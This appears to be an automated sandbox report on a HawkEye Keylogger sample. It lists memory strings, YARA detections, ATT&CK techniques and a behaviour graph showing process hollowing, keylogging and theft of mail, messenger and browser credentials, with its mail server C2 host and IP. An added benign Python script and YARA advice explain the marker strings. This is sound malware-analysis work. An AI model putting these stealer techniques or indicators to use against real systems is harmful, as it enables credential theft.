                    Source: INQUIRY.exe; String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe; String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp; String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp; String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp; String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp; String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp; String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp; String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp; String found in binary or memory: HawkEyeKeylogger
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp; String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp; String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
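                    The marker strings above carry odd single characters in front of them ("!HawkEyeKeylogger", "EHawkEye_Keylogger_Stealer_Records_", "CHawkEye_Keylogger_Keylog_Records_", "MHawkEye_Keylogger_Execution_Confirmed_", and the pair "q'&..." / 'q#"...'). Those are not part of the literals; they are length fields that the sandbox's NUL-skipping string extractor rendered as text. In every case the single prefix byte equals 2*len+1, which is exactly the compressed length of an ECMA-335 #US heap blob (UTF-16LE chars plus one trailing flag byte), and in the "q'&" form the two bytes are len+1 and len, which is the m_arrayLength / m_stringLength pair of a CLR 2.0 System.String object on the managed heap (the runtime the hollowed vbc.exe comes from is v2.0.50727; CLR 4 dropped m_arrayLength). The check below is an added example, not part of the report or of any HawkEye tooling: it rebuilds both layouts for the report's literals, renders them the way a lenient strings pass would, and confirms which layout each observed prefix matches. The MethodTable pointer value is made up; its only property is that 0x71 ('q') is its one printable byte, which reproduces the observed rendering. Where the report shows blobs run together (".txtU...", "_M..."), only the leading prefix of each marker is checked.

```python
"""Explain the stray characters in front of the HawkEye marker strings.

Added example, not part of the sandbox report. The marker literals are the
ones the report lists; the two layouts are the ECMA-335 #US heap blob and the
CLR 2.0 System.String object. The MethodTable pointer value is made up.
"""


def compressed_uint(n):
    """ECMA-335 II.23.2 compressed unsigned integer (1, 2 or 4 bytes)."""
    if n < 0x80:
        return bytes([n])
    if n < 0x4000:
        return bytes([0x80 | (n >> 8), n & 0xFF])
    return bytes([0xC0 | (n >> 24), (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF])


def us_heap_blob(s):
    """#US heap entry: compressed length, UTF-16LE chars, one trailing flag byte.
    The length counts the trailing byte, so for ASCII text it is 2*len(s)+1."""
    body = s.encode("utf-16-le") + b"\x00"  # 0x00: no chars need special handling
    return compressed_uint(len(body)) + body


def clr2_string_object(s, methodtable=0x710B0C00):
    """x86 CLR 2.0 System.String on the GC heap:
    [MethodTable*][m_arrayLength = len+1][m_stringLength = len][UTF-16LE][two NULs].
    m_arrayLength was dropped in CLR 4, so the double count dates the runtime.
    The MethodTable pointer is a made-up value whose only printable byte is 'q'."""
    n = len(s)
    return (methodtable.to_bytes(4, "little")
            + (n + 1).to_bytes(4, "little")
            + n.to_bytes(4, "little")
            + s.encode("utf-16-le") + b"\x00\x00")


def lenient_strings(buf):
    """Render a buffer the way a NUL-skipping ASCII strings pass does, which is
    what turns the 0x21 length byte into a '!' glued to 'HawkEyeKeylogger'."""
    return "".join(chr(b) for b in buf if 0x20 <= b < 0x7F)


def explain_prefix(rendered, literal):
    """Return 'us-heap', 'clr2-object' or None for an observed rendering of a literal."""
    if lenient_strings(us_heap_blob(literal)) == rendered:
        return "us-heap"
    if lenient_strings(clr2_string_object(literal)) == rendered:
        return "clr2-object"
    return None


# Observed rendering (from the report) -> the literal it wraps.
RENDERED = {
    "!HawkEyeKeylogger": "HawkEyeKeylogger",
    "EHawkEye_Keylogger_Stealer_Records_": "HawkEye_Keylogger_Stealer_Records_",
    "CHawkEye_Keylogger_Keylog_Records_": "HawkEye_Keylogger_Keylog_Records_",
    "MHawkEye_Keylogger_Execution_Confirmed_": "HawkEye_Keylogger_Execution_Confirmed_",
    "q'&HawkEye_Keylogger_Execution_Confirmed_": "HawkEye_Keylogger_Execution_Confirmed_",
    'q#"HawkEye_Keylogger_Stealer_Records_': "HawkEye_Keylogger_Stealer_Records_",
}


def explain_all():
    """Verdict for every observed rendering in RENDERED."""
    return {rendered: explain_prefix(rendered, lit) for rendered, lit in RENDERED.items()}


if __name__ == "__main__":
    for rendered, verdict in explain_all().items():
        print(f"{verdict or 'unexplained':12} {rendered}")
```

                    Two practical consequences follow. First, these literals sit in memory as UTF-16, so a YARA rule that hunts for them needs the `wide` modifier (or `ascii wide` to also hit decoded copies in logs and reports); an ASCII-only pattern would miss the process memory that produced these rows. Second, the "q'&" form is only present in the read-write dumps at 0x2A41000 and 0x2E11000, which is where live System.String objects rather than the assembly image would be; reading the 00000004 field of those dump names as PAGE_READWRITE is an assumption here, but it is consistent with a GC heap, and it means the stealer had actually built those strings at run time rather than merely carrying them in the PE.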
                    Yara detected HawkEye Keylogger
                    Source: Yara match; File source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Techniques per tactic (digits following a technique name are the report's signature-count badges, carried over as printed):

                    Initial Access: Replication Through Removable Media1, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain, Compromise Hardware Supply Chain
                    Execution: Windows Management Instrumentation21, Native API11, Shared Modules1, At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell, Unix Shell, Visual Basic
                    Persistence: DLL Side-Loading1, Application Shimming1, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
                    Privilege Escalation: DLL Side-Loading1, Application Shimming1, Process Injection511, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task
                    Defense Evasion: Disable or Modify Tools1, Deobfuscate/Decode Files or Information11, Obfuscated Files or Information21, Software Packing41, DLL Side-Loading1, Masquerading1, Modify Registry1, Virtualization/Sandbox Evasion6, Process Injection511, Hidden Files and Directories1, Right-to-Left Override, Rename System Utilities, Masquerade Task or Service
                    Credential Access: OS Credential Dumping1, Input Capture211, Credentials in Registry2, Credentials In Files1, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging, GUI Input Capture
                    Discovery: System Time Discovery1, Peripheral Device Discovery1, Account Discovery1, File and Directory Discovery1, System Information Discovery39, Query Registry1, Security Software Discovery1101, Virtualization/Sandbox Evasion6, Process Discovery3, Application Window Discovery11, System Owner/User Discovery1, Remote System Discovery1, System Network Configuration Discovery1
                    Lateral Movement: Replication Through Removable Media1, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media, Component Object Model and Distributed COM, Exploitation of Remote Services
                    Collection: Archive Collected Data11, Data from Local System1, Screen Capture1, Email Collection1, Input Capture211, Clipboard Data3, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture, Email Collection
                    Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium, Exfiltration over USB, Commonly Used Port
                    Command and Control: Ingress Tool Transfer1, Encrypted Channel12, Non-Standard Port1, Remote Access Software1, Non-Application Layer Protocol2, Application Layer Protocol13, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS, Proxy
                    Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
                    Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
                    Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement

                    Behavior Graph

                    Behavior Graph ID: 319686; Sample: INQUIRY.exe; Startdate: 18/11/2020; Architecture: WINDOWS; Score: 100

                    Start node (2)
                      DNS/IP: 121.205.6.0.in-addr.arpa; whatismyipaddress.com
                      Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                      Started: INQUIRY.exe (14)

                    INQUIRY.exe (14)
                      Signatures: Detected unpacking (changes PE section rights); Detected unpacking (creates a PE file in dynamic memory); Detected unpacking (overwrites its own PE header); 2 other signatures
                      Started: INQUIRY.exe (17); INQUIRY.exe (19)

                    INQUIRY.exe (17)
                      Started: INQUIRY.exe (23)

                    INQUIRY.exe (19), badges: 15, 6
                      DNS/IP: mail.iigcest.com, 166.62.27.57, ports 49750, 49774, 587, AS-26496-GO-DADDY-COM-LLCUS United States; 121.205.6.0.in-addr.arpa; 2 other IPs or domains
                      Signatures: Changes the view of files in windows explorer (hidden files and folders); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
                      Started: vbc.exe (26), badge: 1; WerFault.exe (28), badges: 3, 9; vbc.exe (31), badge: 13; dw20.exe (33), badges: 22, 6

                    INQUIRY.exe (23)
                      Signatures: Maps a DLL or memory area into another process
                      Started: INQUIRY.exe (35); INQUIRY.exe (37), badge: 6

                    vbc.exe (26)
                      Signatures: Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)

                    WerFault.exe (28)
                      Dropped: C:\ProgramData\Microsoft\...\WER1B59.tmp.mdmp (Mini); C:\ProgramData\Microsoft\...\Report.wer (Little-endian)

                    INQUIRY.exe (35)
                      Started: INQUIRY.exe (41)

                    INQUIRY.exe (37)
                      DNS/IP: mail.iigcest.com; 121.205.6.0.in-addr.arpa; whatismyipaddress.com
                      Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; 2 other signatures
                      Started: vbc.exe (44); WerFault.exe (46); dw20.exe (49); vbc.exe (51)

                    INQUIRY.exe (41)
                      Signatures: Maps a DLL or memory area into another process
                      Started: INQUIRY.exe (53); INQUIRY.exe (55)

                    vbc.exe (44)
                      Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)

                    WerFault.exe (46)
                      Dropped: C:\ProgramData\Microsoft\...\WERAB44.tmp.mdmp (Mini); C:\ProgramData\Microsoft\...\Report.wer (Little-endian)

                    INQUIRY.exe (53)
                      Started: INQUIRY.exe (59)

                    INQUIRY.exe (55)
                      DNS/IP: 121.205.6.0.in-addr.arpa; 104.16.155.36, ports 443, 49777, 49778, CLOUDFLARENETUS United States; whatismyipaddress.com
                      Signatures: Installs a global keyboard hook
                      Started: dw20.exe (62)

                    INQUIRY.exe (59)
                      Signatures: Maps a DLL or memory area into another process
                      Started: INQUIRY.exe (64); INQUIRY.exe (68)

                    INQUIRY.exe (64)
                      DNS/IP: 121.205.6.0.in-addr.arpa; whatismyipaddress.com
                      Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; 2 other signatures
                      Started: vbc.exe (70); vbc.exe (73); WerFault.exe (75); dw20.exe (78)

                    vbc.exe (70)
                      Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)

                    vbc.exe (73)
                      Signatures: Tries to harvest and steal browser information (history, passwords, etc)

                    WerFault.exe (75)
                      Dropped: C:\ProgramData\Microsoft\...\WER7CAE.tmp.mdmp (Mini)


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    INQUIRY.exe | 44% | Virustotal |
                    INQUIRY.exe | 42% | ReversingLabs | Win32.Trojan.Wacatac
                    INQUIRY.exe | 100% | Joe Sandbox ML |

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    0.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    16.2.INQUIRY.exe.22e0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    32.2.INQUIRY.exe.2680000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    32.2.INQUIRY.exe.2680000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    16.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.INQUIRY.exe.21e0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    33.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.INQUIRY.exe.2270000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.2270000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    29.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    13.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    28.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    16.2.INQUIRY.exe.2370000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.2370000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    0.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    0.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    27.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    27.2.INQUIRY.exe.2640000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    1.1.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    34.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    17.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    37.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    6.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    0.2.INQUIRY.exe.25f0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.22f0000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.22f0000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.22f0000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.22f0000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    27.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    1.2.INQUIRY.exe.2300000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.2300000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    16.2.INQUIRY.exe.2490000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.2490000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.2210000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    28.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    13.2.INQUIRY.exe.2660000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    13.2.INQUIRY.exe.2660000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    33.2.INQUIRY.exe.2380000.3.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    33.2.INQUIRY.exe.2380000.3.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    20.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438
                    2.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    32.2.INQUIRY.exe.2630000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.7a0000.1.unpack | 100% | Avira | TR/Inject.vcoldi
                    16.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    16.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    32.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    27.2.INQUIRY.exe.25e0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.2240000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.2240000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    1.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473

                    Domains

                    Source | Detection | Scanner | Label
                    mail.iigcest.com | 0% | Virustotal |

                    URLs

                    Source | Detection | Scanner | Label
                    http://www.jiyu-kobo.co.jp/://w | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/typo | 0% | Avira URL Cloud | safe
                    http://www.fontbureau.comsiv& | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/Treb | 0% | Avira URL Cloud | safe
                    http://www.carterandcone.comandh | 0% | Avira URL Cloud | safe
                    http://www.jiyu-kobo.co.jp/jp// | 0% | Avira URL Cloud | safe
